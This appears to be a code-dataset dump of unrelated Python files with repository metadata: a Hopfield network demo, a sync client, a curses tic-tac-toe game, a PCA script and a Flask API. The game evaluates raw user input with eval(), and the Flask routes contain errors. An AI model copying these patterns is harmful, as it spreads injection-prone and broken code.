| 25.979167
| 57
| 0.565357
| 940
| 0.753809
| 0
| 0
| 0
| 0
| 0
| 0
| 53
| 0.042502
|
b1612586b6458c702c53a9e35ab3d78b199a5137
| 3,948
|
py
|
Python
|
hopfield.py
|
mstruijs/neural-demos
|
2be157bbac4b42c008190745bb3ee75a278d7e34
|
[
"MIT"
] | null | null | null |
hopfield.py
|
mstruijs/neural-demos
|
2be157bbac4b42c008190745bb3ee75a278d7e34
|
[
"MIT"
] | null | null | null |
hopfield.py
|
mstruijs/neural-demos
|
2be157bbac4b42c008190745bb3ee75a278d7e34
|
[
"MIT"
] | null | null | null |
import numpy as np
from neupy import algorithms,plots
import matplotlib.pyplot as plt
from neupy.utils import format_data
from neupy.algorithms.memory.utils import bin2sign,step_function
import argparse
dhnet = algorithms.DiscreteHopfieldNetwork(mode='async', check_limit=False)
iteration = 0
output_data = None
n_features = 0
def ascii_visualise(bin_vector, m=10,n=10):
'''
Basic visualisation for debug purposes: print binary vector as m x n matrix
'''
for row in bin_vector.reshape((n,m)).tolist():
print(' '.join('.X'[val] for val in row))
def read_data(filename):
'''
Read the training/test data from file and return it in a list of matrices.
'''
res = [];
m = [];
rf = open(filename, 'r')
for line in rf.readlines():
if len(line) == 1:#empty line
res.append(np.matrix(m))
m = [];
continue
for char in line.strip():
m.append(1 if char=='X' else 0)
res.append(np.matrix(m))
rf.close()
return res
def train(data):
'''
Train the network with the supplied data
'''
dhnet.train(np.concatenate(data, axis = 0))
def run(input, iterations=None, show=False):
'''
Run the trained network with the given input, for the specified number of iterations.
Print the the result if `show`
'''
result = dhnet.predict(input, iterations)
if show:
ascii_visualise(result)
print()
return result
def show_weights():
'''
Plot the weight matrix in a Hinton diagram
'''
plt.figure(figsize=(14,12))
plt.title("Hinton diagram (weights)")
plots.hinton(dhnet.weight)
plt.show()
def initialise_run(input_data):
'''
Prepare a controlled iteration on a trained network for the given input
'''
global iteration,dhnet,output_data,n_features
iteration = 0
dhnet.discrete_validation(input_data)
input_data = format_data(bin2sign(input_data), is_feature1d=False)
_, n_features = input_data.shape
output_data = input_data
def step(step_size=1, show=False):
'''
Execute `step_size` asynchronous update steps on the initialised network.
Print the result if `show`.
'''
global iteration,dhnet,output_data,n_features
for _ in range(step_size):
iteration+=1
position = np.random.randint(0, n_features - 1)
raw_new_value = output_data.dot(dhnet.weight[:, position])
output_data[:, position] = np.sign(raw_new_value)
result = step_function(output_data).astype(int)
if show:
print("--Iteration " + str(iteration) + ":")
ascii_visualise(result)
return result
def is_stable():
'''
Return True iff the initialised network has reached a stable output
'''
global dhnet,output_data,n_features,iteration
for position in range(0,n_features-1):
raw_new_value = output_data.dot(dhnet.weight[:, position])
if np.sign(raw_new_value) != output_data[0][position]:
return False
return True
def run_to_convergence(input_data, show_list=[], show_all=True):
'''
Runs a trained network on `input_data` until it converges to a stable output.
Print the intermediate output at all positions in `show_list`.
'''
initialise_run(input_data)
i=0
result = None
while not(is_stable()):
i+=1
result=step(show=(i in show_list or show_all))
return result
def get_args():
parser = argparse.ArgumentParser(description='Hopfield neural network')
parser.add_argument('-g','--train', help='Training data set path', required=True)
parser.add_argument('-t','--test', help='Testing data set path', required=True)
return vars(parser.parse_args())
if __name__ == "__main__":
args = get_args()
training_data = read_data(str(args['train']))
train(training_data)
test_data = read_data(str(args['test']))
print('--Start')
ascii_visualise(test_data[0])
step_run = False
if step_run:
initialise_run(test_data[0])
for i in range(1,300,5):
print("--Iteration " + str(i) + ":")
step(step_size=5,show=True)
if is_stable():
break
else:
res = run_to_convergence(test_data[0],[62,144,232,379])
print("--Iteration " + str(iteration) + ":")
ascii_visualise(res)
print('--End')
| 27.608392
| 87
| 0.719352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,065
| 0.269757
|
b161578913391598cf5bd530a5ec301a0546f6e8
| 686
|
py
|
Python
|
client/fig_client.py
|
haihala/fig
|
426e2ee218c8a55e6389ace497a7f365425daae1
|
[
"MIT"
] | null | null | null |
client/fig_client.py
|
haihala/fig
|
426e2ee218c8a55e6389ace497a7f365425daae1
|
[
"MIT"
] | null | null | null |
client/fig_client.py
|
haihala/fig
|
426e2ee218c8a55e6389ace497a7f365425daae1
|
[
"MIT"
] | null | null | null |
from init import conf_parse, socket_init
from sock_ops import pull_sync, push_sync
from fs_ops import construct_tree, differences
from debug import debug_print
import time
def main():
conf = conf_parse()
sock = socket_init(conf)
debug_print("Initialization successful")
debug_print("Checking remote")
pull_sync(sock, conf["project"])
debug_print("Pull successfull")
client_tree = construct_tree()
while True:
if differences(client_tree):
debug_print("Different spotted, pushing")
client_tree = construct_tree()
push_sync(sock, conf["project"])
if conf["auto"]:
time.sleep(conf["auto"])
else:
input("Enter to sync")
if __name__ == "__main__":
main()
| 21.4375
| 46
| 0.740525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.21137
|
b161de6456d6f8b14c33e69247fe9c0fa8b2fa93
| 23,850
|
py
|
Python
|
TicTacToe2.py
|
tlively/N-TicTacToe
|
db1143e2e94012451ba590952670452431814b7b
|
[
"MIT"
] | 6
|
2017-10-03T13:37:54.000Z
|
2020-12-21T07:34:01.000Z
|
TicTacToe2.py
|
tlively/N-TicTacToe
|
db1143e2e94012451ba590952670452431814b7b
|
[
"MIT"
] | null | null | null |
TicTacToe2.py
|
tlively/N-TicTacToe
|
db1143e2e94012451ba590952670452431814b7b
|
[
"MIT"
] | 4
|
2017-07-04T18:53:52.000Z
|
2021-03-24T03:15:07.000Z
|
# N-Dimensional Tic-Tac-Toe by Thomas Lively
from __future__ import division
import curses, curses.ascii, sys
# logical representation of the n-dimensional board as a single list
class Model(object):
def __init__(self, dimensions=2, size=0, players=2):
if size < 3:
size = dimensions+1
self.dimensions = dimensions
self.size = size
if self.size < 3:
self.size = 3
self.players = players
if self.players < 2 or self.players > 9:
self.players = 2
self.board = [0 for i in xrange(size**dimensions)]
self.current_player = 1
self.game_over = False
self.tied_game = False
self.moves = 0
# makes the next player the active player
def nextTurn(self):
self.current_player += 1
if self.current_player > self.players:
self.current_player = 1
return self.current_player
def playAtCoordinate(self, coord):
self.validateCoord(coord)
self.playAtIndex(self.getIndexFromCoord(coord))
# puts the current player's number into this index of the array then check game over
def playAtIndex(self, index):
self.validateIndex(index)
if self.board[index] != 0:
raise IllegalMoveError(index)
return
self.board[index] = self.current_player
seqs = self.getSequencesFromIndex(index)
for seq in seqs:
n = 0
for coord in seq:
if self.board[self.getIndexFromCoord(coord)] == self.current_player:
n += 1
if n == self.size:
self.game_over = True
break
self.moves += 1
if self.moves == self.size ** self.dimensions:
self.tied_game = True
self.game_over = True
def getIndexFromCoord(self, coord):
self.validateCoord(coord)
index = 0
for i in xrange(len(coord)-1,-1,-1):
index += coord[i]*(self.size**i)
return index
def getCoordFromIndex(self, index):
self.validateIndex(index)
coord_list = []
for i in xrange(self.dimensions):
nd = self.size**(self.dimensions-1-i)
coord_list.append(index//nd)
index %= nd
coord_list.reverse()
return tuple(coord_list)
def getSequencesFromIndex(self, index):
return self.getSequencesFromCoord(self.getCoordFromIndex(index))
# returns all the possible winning sequences containing this coordinate set
def getSequencesFromCoord(self, coord):
# from a set of indices, return a subset with elements indicated by the ones in
# bin_rep
def getIndexSet(indices, bin_rep):
iset = []
for i in xrange(len(indices)):
if bin_rep[i] == u"1":
iset.append(indices[i])
return iset
# given a set of indices that should be varied, return the n versions of coord
def getVariedSequences(varying_indices):
returned_sequences = []
for i in xrange(self.size):
new_coord = list(coord)
for index in varying_indices:
if coord[index] < self.size//2:
new_coord[index] = i
else:
new_coord[index] = self.size-i-1
returned_sequences.append(new_coord)
return returned_sequences
# given a set of indices that should be varied and a binary representation of
# the direction in which they should vary, return the n versions of coord
def getMidVariedSequences(varying_indices, vary_dir):
returned_sequences = []
for i in xrange(self.size):
new_coord = list(coord)
for j in xrange(len(varying_indices)):
if vary_dir[j] == u"1":
new_coord[varying_indices[j]] = i
else:
new_coord[varying_indices[j]] = self.size-i-1
returned_sequences.append(new_coord)
return returned_sequences
self.validateCoord(coord)
returned_sequences = []
# for values up to half if evenly sized, up to middle-1 if oddly sized
for x in xrange(self.size//2+1):
x2 = self.size-x-1
all_indices = []
for index in xrange(len(coord)):
if coord[index] == x or coord[index] == x2:
all_indices.append(index)
for i in xrange(1, 2 ** len(all_indices)):
bin_rep = bin(i)[2:]
while len(bin_rep) < len(all_indices):
bin_rep = u"0" + bin_rep
iset = getIndexSet(all_indices, bin_rep)
if x != x2:
returned_sequences.append(getVariedSequences(iset))
else:
for j in xrange(2 ** (len(iset)-1)):
dir_vary = bin(j)[2:]
while len(dir_vary) < len(iset):
dir_vary = u"0" + dir_vary
mid_sequences = getMidVariedSequences(iset, dir_vary)
returned_sequences.append(mid_sequences)
return returned_sequences
def validateIndex(self, index):
if index < 0 or index >= len(self.board):
raise ValueError(u"Invalid index")
def validateCoord(self, coord):
if len(coord) != self.dimensions:
raise ValueError(u"Coordinate needs " + unicode(self.dimensions) + u" dimensions")
return
for i in coord:
if i >= self.size or i < 0:
raise ValueError(u"0 <= coordinate < " + unicode(self.size))
return
# xy pairs from high order to low order to model coordinates
def XYCoordToCoord(self, xy):
coord = []
start = 0
if self.dimensions % 2 == 1:
start = 1
for i in xrange(start+1, len(xy), 2):
coord.insert(0, xy[i])
if start == 1:
coord.insert(0, xy[0])
for i in xrange(start, len(xy), 2):
coord.insert(0, xy[i])
return tuple(coord)
class IllegalMoveError(Exception):
def __init__(self, index):
self.index = index
def __str__(self):
return u"Illegal move at index " + unicode(self.index)
# A view for the model. Other views might use Curses or a graphics library
class PlainTextView():
def __init__(self, model):
self.model = model
self.create()
# returns the divider that goes between board units of the d-th horizontal order
def getHorizontalDivider(self, d):
if d < 0: return
if d == 0: return [u"|"]
if d == 1: return [u" "]
div = [u" ", u" "]
for i in xrange(d-1):
div.insert(1, u"|")
return div
# returns the divider that goes between board units of the d-th vertical order
def getVerticalDivider(self, d):
if d < 0: return
if d == 0: return [u"-"]
if d == 1: return [u" "]
div = [u" ", u" "]
for i in xrange(d-1):
div.insert(1, u"-")
return div
# recursively create the board as a matrix of characters
def createMatrix(self, d):
if d < 0: return
if d == 0: return [[u"X"]]
sub_block = self.createMatrix(d-1)
returned = []
if d % 2 == 1:
divider = self.getHorizontalDivider(d // 2)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
for i in xrange(self.model.size - 1):
for char in divider:
new_row.append(char)
for char in row:
new_row.append(char)
returned.append(new_row)
return returned
if d % 2 == 0:
divider = self.getVerticalDivider(d // 2 - 1)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
returned.append(new_row)
for i in xrange (self.model.size - 1):
for char in divider:
new_row = []
for j in xrange(len(sub_block[0])):
new_row.append(char)
returned.append(new_row)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
returned.append(new_row)
return returned
# use the matrix of characters that make up the board to create maps from the
# representation's indices to the models and vice versa, and create an str
def create(self):
matrix = self.createMatrix(self.model.dimensions)
self.str_rep = u""
for row in matrix:
for char in row:
self.str_rep += char
self.str_rep += u"\n"
#print(str_rep)
self.model_to_view = dict()
self.view_to_model = dict()
model_index = 0
for i in xrange(len(self.str_rep)):
if self.str_rep[i] == u"X":
self.str_rep = self.str_rep.replace(u"X", u" ", 1)
self.model_to_view[model_index] = i
self.view_to_model[i] = model_index
model_index += 1
# given char from model, return char for display
def getDisplayChar(self, c):
if c == 0: return u" "
if self.model.players == 2:
if c == 1: return u"X"
if c == 2: return u"O"
return unicode(c)
# must be called to update the view when the state of index i in the model changes
def update(self, i):
index = self.model_to_view[i]
char = self.getDisplayChar(self.model.board[i])
self.str_rep = self.str_rep[:index] + char + self.str_rep[index+1:]
def __str__(self):
return self.str_rep
# serves as a "Main" class and controls user interface with model and view
class TextGameController():
def __init__(self):
dimensions = int(raw_input(u"dimensions: "))
size = int(raw_input(u"size: "))
players = int(raw_input(u"players: "))
print u"creating model..."
self.board = Model(dimensions, size, players)
print u"creating view..."
self.view = PlainTextView(self.board)
while True:
print
print self.view
print
player = u"Player " + unicode(self.board.current_player)
coord = self.makeMove(player + u": ")
self.view.update(self.board.getIndexFromCoord(coord))
if self.board.game_over:
if self.board.tied_game:
print u"It's a tie :("
break
print self.view
print
print player + u" wins!"
break
self.board.nextTurn()
# transform user input to model coordinates
# and coordinates through necessary checks, repeating if necessary
def makeMove(self, prompt):
coord = None
while True:
try:
raw_in = eval(u"(" + raw_input(prompt) + u")")
coord = self.board.XYCoordToCoord(raw_in)
print coord
except Exception, e:
print u"Unrecognizable input"
continue
try:
self.board.validateCoord(coord)
except Exception, e:
print e
continue
try:
self.board.playAtCoordinate(coord)
break
except Exception, e:
print u"Illegal move!"
continue
return coord
class CursesController(object):
def main(self, stdscr):
model = self.model
view = self.view
def alert():
curses.beep()
curses.flash()
uneven = model.dimensions % 2 != 0
locked_coords = []
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
def getEnclosingRectangle(coord):
extension = xrange(model.dimensions - len(coord))
min_xycoord = coord[:]
min_xycoord.extend([0 for i in extension])
min_coord = model.XYCoordToCoord(min_xycoord)
max_xycoord = coord[:]
max_xycoord.extend([model.size-1 for i in extension])
max_coord = model.XYCoordToCoord(max_xycoord)
min_index = view.model_to_view[model.getIndexFromCoord(min_coord)]
min_index = min_index - unicode(view).count(u"\n",0, min_index)
max_index = view.model_to_view[model.getIndexFromCoord(max_coord)]
max_index = max_index - unicode(view).count(u"\n",0, max_index)
length = unicode(view).find(u"\n")
min_x = min_index % length
min_y = min_index // length
max_x = max_index % length
max_y = max_index // length
return (min_y,min_x,max_y,max_x)
def getPlayerColor(p):
colors = {1:4,2:1,3:2,4:3,5:5,6:6,7:7,8:5,9:7}
return int(colors[((p-1)%9)+1])
curses.curs_set(0)
win = curses.newpad(unicode(view).count(u"\n")+1, unicode(view).find(u"\n")+1)
for i in xrange(1,8):
curses.init_pair(i,i,0)
history = []
initialized = False
while not model.game_over:
stdscr.clear()
# Title Box Outline
stdscr.addch(0,0,curses.ACS_ULCORNER)
stdscr.hline(0,1,curses.ACS_HLINE,curses.COLS-2)
stdscr.addch(0,curses.COLS-1,curses.ACS_URCORNER)
stdscr.vline(1,0,curses.ACS_VLINE,3)
stdscr.vline(1,curses.COLS-1,curses.ACS_VLINE,3)
panel_width = model.dimensions * 2 + 11
# Board Area Outline
stdscr.addch(4,0,curses.ACS_ULCORNER)
stdscr.hline(4,1,curses.ACS_HLINE,curses.COLS-panel_width-1)
stdscr.addch(curses.LINES-1,0,curses.ACS_LLCORNER)
stdscr.hline(curses.LINES-1,1,curses.ACS_HLINE,curses.COLS-panel_width-1)
stdscr.vline(5,0,curses.ACS_VLINE,curses.LINES-6)
# Top Panel Box Outline
stdscr.addch(4,curses.COLS-panel_width,curses.ACS_ULCORNER)
stdscr.hline(4,curses.COLS-panel_width+1,curses.ACS_HLINE,panel_width-2)
stdscr.addch(4,curses.COLS-1,curses.ACS_URCORNER)
stdscr.vline(5,curses.COLS-panel_width,curses.ACS_VLINE,4)
stdscr.vline(5,curses.COLS-1,curses.ACS_VLINE,4)
stdscr.addch(9,curses.COLS-panel_width,curses.ACS_LLCORNER)
stdscr.addch(9,curses.COLS-1,curses.ACS_LRCORNER)
stdscr.hline(9,curses.COLS-panel_width+1,curses.ACS_HLINE,panel_width-2)
# Bottom Panel OUTLINE
stdscr.vline(10,curses.COLS-panel_width,curses.ACS_VLINE,curses.LINES-11)
stdscr.vline(10,curses.COLS-1,curses.ACS_VLINE,curses.LINES-11)
stdscr.addch(curses.LINES-1,curses.COLS-panel_width,curses.ACS_LLCORNER)
stdscr.hline(curses.LINES-1,curses.COLS-panel_width+1,
curses.ACS_HLINE,panel_width-2)
try:stdscr.addch(curses.LINES-1,curses.COLS-1,curses.ACS_LRCORNER)
except:pass
title = u"N-Dimensional Tic-Tac-Toe ({0}^{1})"\
.format(model.size,model.dimensions)
stdscr.addstr(2, curses.COLS//2 - len(title)//2, title)
# Get input
key = None
curses.flushinp()
if initialized:
key = win.getch()
else:
initialized = True
if key == ord(u"w"):
if selected_y == 0 or len(locked_coords) == 0 and uneven:
alert()
else:
selected_y -= 1
if key == ord(u"s"):
if selected_y == model.size-1 or len(locked_coords) == 0 and uneven:
alert()
else:
selected_y += 1
if key == ord(u"a"):
if selected_x == 0:
alert()
else:
selected_x -= 1
if key == ord(u"d"):
if selected_x == model.size-1:
alert()
else:
selected_x += 1
if key == ord(u"\n"):
locked_coords.append(selected_x)
if not (len(locked_coords) == 1 and uneven):
locked_coords.append(selected_y)
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
if len(locked_coords) == model.dimensions:
try:
coord = model.XYCoordToCoord(locked_coords)
model.playAtCoordinate(coord)
view.update(model.getIndexFromCoord(coord))
history.insert(0, (model.current_player, locked_coords[:]))
del locked_coords[:]
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
if not model.game_over:
model.nextTurn()
except Exception:
key = curses.ascii.ESC
if key == curses.ascii.ESC:
if len(locked_coords) == 0:
alert()
else:
selected_y = locked_coords[-1]
del locked_coords[-1]
if not (len(locked_coords) == 0):
selected_x = locked_coords[-1]
del locked_coords[-1]
else:
selected_x = selected_y
selected_y = 0
# Draw info box contents
info_line = u"Player {0}".format(model.current_player)
stdscr.addstr(6, int(curses.COLS-(panel_width + len(info_line))/2),
info_line,
curses.color_pair(
getPlayerColor(
model.current_player)))
info_coord = locked_coords[:]
info_coord.append(selected_x)
if not (len(locked_coords) == 0 and uneven):
info_coord.append(selected_y)
info_line = unicode(info_coord)[1:-1].replace(u" ", u"")
stdscr.addstr(7, int(curses.COLS-(panel_width + len(info_line))/2),
info_line,
curses.color_pair(
getPlayerColor(
model.current_player)))
# Draw move history
for i, move in enumerate(history):
if 10 + i == curses.LINES -1:
break
p, loc = move
loc = unicode(loc)[1:-1].replace(u" ", u"")
stdscr.addstr(10+i, curses.COLS-panel_width+1,
u"Player {0}: {1}".format(p, loc),
curses.color_pair(getPlayerColor(p)))
# Draw board
win.addstr(0,0, unicode(view))
# Highlight selected area
coord = locked_coords[:]
coord.append(selected_x)
if not (len(locked_coords) == 0 and uneven):
coord.append(selected_y)
min_y,min_x,max_y,max_x = getEnclosingRectangle(coord)
for y in xrange(min_y, max_y+1):
win.chgat(y, min_x, max_x + 1 - min_x,
curses.A_REVERSE |
curses.color_pair(getPlayerColor(model.current_player)))
# Highlight past moves
for p, loc in history:
rect = getEnclosingRectangle(loc)
current = win.inch(rect[0], rect[1])
if current == current | curses.A_REVERSE:
win.chgat(rect[0], rect[1], 1, curses.color_pair(getPlayerColor(p)))
else:
win.chgat(rect[0], rect[1], 1,
curses.color_pair(getPlayerColor(p)) | curses.A_REVERSE)
# Calculate area of board to display
pminrow = 0
pmincol = 0
pheight = unicode(view).count(u"\n")-1
pwidth = unicode(view).find(u"\n")-1
sminrow = 5
smincol = 1
smaxrow = curses.LINES-2
smaxcol = curses.COLS-panel_width-1
sheight = smaxrow - sminrow
swidth = smaxcol - smincol
if pheight <= sheight:
dif = sheight - pheight
sminrow += dif // 2
else:
pminrow1 = min_y - sheight * min_y / pheight
pminrow2 = sheight/pheight*(pheight-max_y) + max_y - sheight
dif1 = min_y
dif2 = pheight - max_y
if not (dif1 == 0 and dif2 == 0):
pminrow = int((pminrow1 * dif2 + pminrow2 * dif1) / (dif1 + dif2)+.5)
else:
dif = sheight - pheight
sminrow += dif // 2
if pwidth <= swidth:
dif = swidth - pwidth
smincol += dif // 2
else:
pmincol1 = min_x - swidth * min_x / pwidth
pmincol2 = swidth/pwidth*(pwidth-max_x) + max_x - swidth
dif1 = min_x
dif2 = pwidth - max_x
if not (dif1 == 0 and dif2 == 0):
pmincol = int((pmincol1 * dif2 + pmincol2 * dif1) / (dif1 + dif2)+.5)
else:
dif = swidth - pwidth
smincol += dif // 2
# Refresh the display
stdscr.refresh()
win.refresh(pminrow, pmincol, sminrow, smincol, smaxrow, smaxcol)
stdscr.clear()
win.clear()
if not model.tied_game:
player = model.current_player
message = u"PLAYER {0} WINS!".format(player)
stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
curses.A_BLINK | curses.A_REVERSE | curses.color_pair(getPlayerColor(player)))
else:
message = u"IT'S A TIE :("
stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
curses.A_BLINK | curses.A_REVERSE)
stdscr.getch()
def __init__(self, model):
self.model = model
self.view = PlainTextView(self.model)
curses.wrapper(self.main)
# run the game if run as a script
if __name__ == u"__main__":
#TextGameController()
args = [int(i) for i in sys.argv[1:]]
if args:
CursesController(Model(*args))
else:
CursesController(Model(4))
| 38.405797
| 94
| 0.512704
| 23,258
| 0.975178
| 0
| 0
| 0
| 0
| 0
| 0
| 2,407
| 0.100922
|
b161fd74a00848098e638db57b29a16c1340bf14
| 854
|
py
|
Python
|
platform-tools/systrace/catapult/devil/devil/utils/run_tests_helper.py
|
NBPS-Robotics/FTC-Code-Team-9987---2022
|
180538f3ebd234635fa88f96ae7cf7441df6a246
|
[
"MIT"
] | 1,894
|
2015-04-17T18:29:53.000Z
|
2022-03-28T22:41:06.000Z
|
platform-tools/systrace/catapult/devil/devil/utils/run_tests_helper.py
|
NBPS-Robotics/FTC-Code-Team-9987---2022
|
180538f3ebd234635fa88f96ae7cf7441df6a246
|
[
"MIT"
] | 4,640
|
2015-07-08T16:19:08.000Z
|
2019-12-02T15:01:27.000Z
|
platform-tools/systrace/catapult/devil/devil/utils/run_tests_helper.py
|
NBPS-Robotics/FTC-Code-Team-9987---2022
|
180538f3ebd234635fa88f96ae7cf7441df6a246
|
[
"MIT"
] | 698
|
2015-06-02T19:18:35.000Z
|
2022-03-29T16:57:15.000Z
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper functions common to native, java and host-driven test runners."""
import collections
import logging
from devil.utils import logging_common
CustomFormatter = logging_common.CustomFormatter
_WrappedLoggingArgs = collections.namedtuple('_WrappedLoggingArgs',
['verbose', 'quiet'])
def SetLogLevel(verbose_count, add_handler=True):
"""Sets log level as |verbose_count|.
Args:
verbose_count: Verbosity level.
add_handler: If true, adds a handler with |CustomFormatter|.
"""
logging_common.InitializeLogging(
_WrappedLoggingArgs(verbose_count, 0),
handler=None if add_handler else logging.NullHandler())
| 31.62963
| 75
| 0.725995
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 428
| 0.501171
|
b1623f67cebbb4df1eda133e8176caaaf6a0be46
| 4,819
|
py
|
Python
|
src/classical_ml/pca.py
|
Jagriti-dixit/CS229_Project_Final
|
16fdb55086411dee17153e88b2499c378cdfc096
|
[
"MIT"
] | null | null | null |
src/classical_ml/pca.py
|
Jagriti-dixit/CS229_Project_Final
|
16fdb55086411dee17153e88b2499c378cdfc096
|
[
"MIT"
] | null | null | null |
src/classical_ml/pca.py
|
Jagriti-dixit/CS229_Project_Final
|
16fdb55086411dee17153e88b2499c378cdfc096
|
[
"MIT"
] | null | null | null |
import sys
import time
from comet_ml import Experiment
import pydub
import numpy as np
from pydub import AudioSegment
import librosa
import librosa.display
import matplotlib.pyplot as plt
import sklearn
from sklearn import preprocessing
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
import pandas as pd
from pathlib import Path
import math,random
import zipfile as zf
import soundfile as sf
import pandas as pd
from sklearn import metrics
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import RFE
import json
import matplotlib.pyplot as plt
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
from sklearn.metrics import ConfusionMatrixDisplay
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.metrics import accuracy_score, classification_report, precision_score, recall_score
from sklearn.metrics import confusion_matrix, precision_recall_curve, roc_curve, auc, log_loss
from sklearn.datasets import make_classification
from sklearn.metrics import plot_confusion_matrix
from sklearn.ensemble import RandomForestClassifier
from sklearn import svm
import getSamples as gs
from sklearn.metrics import precision_score, \
recall_score, confusion_matrix, classification_report, \
accuracy_score, f1_score
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import seaborn as sns
train_file = sys.argv[1]
test_file = sys.argv[2]
print("Reading train and test dataset")
#train = pd.read_csv('train_data_noise_pad.csv')
train = pd.read_csv(train_file)
print("read train data")
#test = pd.read_csv('test_data_noise_pad.csv')
test = pd.read_csv(test_file)
print("read test data")
print("Read two big files ")
X_train = train.iloc[:,:2040]
y_train = train.iloc[:,2041]
X_test = test.iloc[:,:2040]
y_test = test.iloc[:,2041]
# X_train = train.iloc[:,:20]
# y_train = train.iloc[:,21]
# X_test = test.iloc[:,:20]
# y_test = test.iloc[:,21]
X_train = StandardScaler(with_mean=True).fit_transform(X_train)
X_test = StandardScaler(with_mean=True).fit_transform(X_test)
print("Mean of train data is ",np.mean(X_train),"Std deviation is",np.std(X_train))
pca = PCA(n_components = 'mle')
pca = PCA().fit(X_train)
print('Explained variation per principal component:{}'.format((pca.explained_variance_ratio_)))
plt.plot(np.cumsum(pca.explained_variance_ratio_))
plt.xlabel('number of components')
plt.ylabel('Cumulative explained variance')
plt.savefig("cumulative_variance_plot.png")
time_start = time.time()
print("we want to see the accumulated variance of 700 features ")
pca = PCA(n_components = 700)
pca_result = pca.fit_transform(X_train)
pca_test = pca.transform(X_test)
X_train_pca = pca_result
X_test_pca = pca_test
out_train = "train_pca.csv"
pca_train = pd.DataFrame(data=X_train_pca)
pca_train['language'] = y_train
out_file_train = open(out_train,'wb')
pca_train.to_csv(out_file_train,index=False)
out_file_train.close()
out_test = "test_pca.csv"
pca_test = pd.DataFrame(data=X_test_pca)
pca_test['language'] = y_test
out_file_test = open(out_test,'wb')
pca_test.to_csv(out_file_test,index=False)
out_file_test.close()
time_start = time.time()
print("shapes are",X_train_pca.shape,y_train.shape)
print("X_train shape is ",X_train_pca.shape,"X_test shape is",X_test_pca.shape)
print("Total variation in these 1000 features is",np.sum(pca.explained_variance_ratio_))
print('PCA done! Time elapsed: {} seconds'.format(time.time()-time_start))
print("Now lets plot PCA for 2D visualisation")
##Taking only some of the total dataset randomly for plotting
np.random.seed(42)
rndperm = np.random.permutation(train.shape[0])
#2D plot(Having two components)
plt.figure(figsize=(16,10))
pca = PCA(n_components = 2)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
sns.scatterplot(
x="pca_one", y="pca_two",
hue="2041",
palette=sns.color_palette("hls", 3),
data=train.loc[rndperm,:],
legend="full",
alpha=0.3
)
plt.savefig("PCA_2d.png")
###PCA with 3 components
pca = PCA(n_components = 3)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
train['pca_three'] = pca_result[:,2]
print("Its processing 3d plot")
#3D plot(Having 3 components)
ax = plt.figure(figsize=(16,10)).gca(projection='3d')
ax.scatter(
xs=train.loc[rndperm,:]["pca_one"],
ys=train.loc[rndperm,:]["pca_two"],
zs=train.loc[rndperm,:]["pca_three"],
c=train.loc[rndperm,:]["2041"],
cmap='tab10'
)
ax.set_xlabel('pca_one')
ax.set_ylabel('pca_two')
ax.set_zlabel('pca_three')
plt.savefig("PCA_3d.png")
| 31.496732
| 97
| 0.775265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,100
| 0.228263
|
b16413494678ee579844f16a2bea9f231ef05803
| 1,601
|
py
|
Python
|
API/application.py
|
XuhuaHuang/LearnPython
|
eb39f11147716193971dd5a8894e675daa1b9d01
|
[
"MIT"
] | null | null | null |
API/application.py
|
XuhuaHuang/LearnPython
|
eb39f11147716193971dd5a8894e675daa1b9d01
|
[
"MIT"
] | null | null | null |
API/application.py
|
XuhuaHuang/LearnPython
|
eb39f11147716193971dd5a8894e675daa1b9d01
|
[
"MIT"
] | null | null | null |
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'
db = SQLAlchemy(app)
class Drink(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
description = db.Column(db.String(120))
def __repr__(self):
return "{} - {}".format(self.name, self.description)
@app.route('/')
def index():
return "Greetings"
@app.route('/drinks')
def get_drinks():
drinks = Drink.query.all() # retrieve all drinks in the database
output = [] # create an empty list to serve as a place holder for JSON object
for drink in drinks:
drink_data = {'name': drink.name, 'description': drink.description}
output.append(drink_data)
return {"drinks": output}
@app.route('/drinks/<id>')
def get_drink(id: int):
drink = Drink.query.get_or_404(id)
return jsonify({'name': drink.name, 'description': drink.description})
@app.route('/drinks', methods=['POST'])
def add_drink():
drink = Drink(name=request.json['name'], description=request.json['description'])
db.session.add(drink)
db.session.commit()
return {'id': drink.id} # return new id for posted drink
@app.route('/drinks/<id>', method=['DELETE'])
def delete_drink():
drink = Drink.quey.get(id)
if drink is None:
return {'Error': 'Drink not found to delete'}
else:
db.session.delete(drink)
db.session.commit()
return {'Confirmation': 'Successfully deleted drink'}
| 28.589286
| 85
| 0.66396
| 266
| 0.166146
| 0
| 0
| 1,131
| 0.706433
| 0
| 0
| 406
| 0.253592
|
b165edb3b3722f2964b765aab8fe578c7cc4aee1
| 2,199
|
py
|
Python
|
examples/mass-generation.py
|
Orange-OpenSource/tinypyki
|
10c57fb3a4413f4c601baaf58e53d92fd4a09f49
|
[
"BSD-3-Clause"
] | 1
|
